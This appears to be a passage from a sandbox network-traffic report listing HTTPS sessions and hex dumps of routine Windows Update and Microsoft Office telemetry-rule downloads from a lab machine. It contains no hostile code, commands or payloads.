                                                    2024-11-25 18:44:41 UTC1390INData Raw: ae 1f 7b 7c fe 33 2f 2f ef bd fd a5 86 6c ce 37 dc 19 bb 8f 3d 54 8f 7c 12 00 00 00 00 00 00 00 f2 22 e6 03 00 1a a4 78 e0 f1 bb bd 74 cb d1 ba b7 78 e5 ed 37 cf cd bd b8 33 43 6d d5 ec e5 de 70 67 ec 1e 7e a8 18 f9 30 00 00 00 00 00 00 00 e4 45 cc 07 00 34 c8 dd 4e da dd b8 e4 5b 73 e6 d2 85 1d 98 68 00 c3 6d cb 97 52 72 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 59 aa 0f 9d 79 ef af 97 6e 3e fc f8 fc 67 36 2d f9 d6 7c f9 c7 df dc 91 99 b6 60 e8 6d f9 8e 1e 70 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 c1 5e b8 7e ec 8b 57 0f 6e fd fd 51 87 ed ce 5e ee 7d e5 fc 8d e1 ae fd e3 4f b6 46 3b 0c 00 00 00 00 00 00 00 39 12 f3 01 00 cd b2 7e d2 ee 56 8e d6 bd dd 99 4b 17 76 bf e7 1b fa 80 dd e4 8c 5d 00 00 00 00 00 00 00 52 4a 29 39 d6 0d 00 68 9c 7f ff f0 0b 7f f3 fa
                                                    Data Ascii: {|3//l7=T|"xtx73Cmpg~0E4N[shmRr.b>Yyn>g6-|`mp.b>^~WnQ^}OF;9~VKv]RJ)9h
                                                    2024-11-25 18:44:41 UTC1390INData Raw: 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13
                                                    Data Ascii: @01@01@01@01@01@01@01@01@01@01


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.4497994.175.87.197443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:43 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pTKuk7a711u7zdz&MD=9dooWE6s HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                    Host: slscr.update.microsoft.com
                                                    2024-11-25 18:44:43 UTC560INHTTP/1.1 200 OK
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Content-Type: application/octet-stream
                                                    Expires: -1
                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                    MS-CorrelationId: a201396c-1d8c-4f21-831c-0cba0f02739d
                                                    MS-RequestId: a5d27d1b-de0e-47e4-b10b-55028f2f4975
                                                    MS-CV: tLSi7Oa3VUKckTdL.0
                                                    X-Microsoft-SLSClientCache: 1440
                                                    Content-Disposition: attachment; filename=environment.cab
                                                    X-Content-Type-Options: nosniff
                                                    Date: Mon, 25 Nov 2024 18:44:43 GMT
                                                    Connection: close
                                                    Content-Length: 30005
                                                    2024-11-25 18:44:43 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                    2024-11-25 18:44:43 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    45192.168.2.44980013.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:44 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:44 UTC471INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:44 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 218853
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Cache-Control: public
                                                    Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                                                    ETag: "0x8DD0BB889D4282C"
                                                    x-ms-request-id: 19b35b80-c01e-0049-150a-3eac27000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184444Z-174c587ffdf9xbcchC1TEBxkz40000000670000000008wk3
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:44 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                    Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                    Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                    Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                    Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                    Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                    Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                    2024-11-25 18:44:45 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                    Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    46192.168.2.44980313.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:47 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:47 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:47 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 450
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                    ETag: "0x8DC582BD4C869AE"
                                                    x-ms-request-id: 97edb58e-001e-00a2-13a4-3ed4d5000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184447Z-178bfbc474bwh9gmhC1NYCy3rs00000007yg00000000a0b8
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:47 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    47192.168.2.44980613.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:47 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:47 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:47 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 408
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                    ETag: "0x8DC582BB56D3AFB"
                                                    x-ms-request-id: e7cf57de-301e-006e-404d-3cf018000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184447Z-15b8b599d88m7pn7hC1TEB4axw000000068g00000000s3qe
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:47 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    48192.168.2.44980513.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:47 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:47 UTC494INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:47 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 2980
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                    ETag: "0x8DC582BA80D96A1"
                                                    x-ms-request-id: d4aa3518-701e-0098-625d-3c395f000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184447Z-15b8b599d88hd9g7hC1TEBp75c000000066g00000000pfas
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
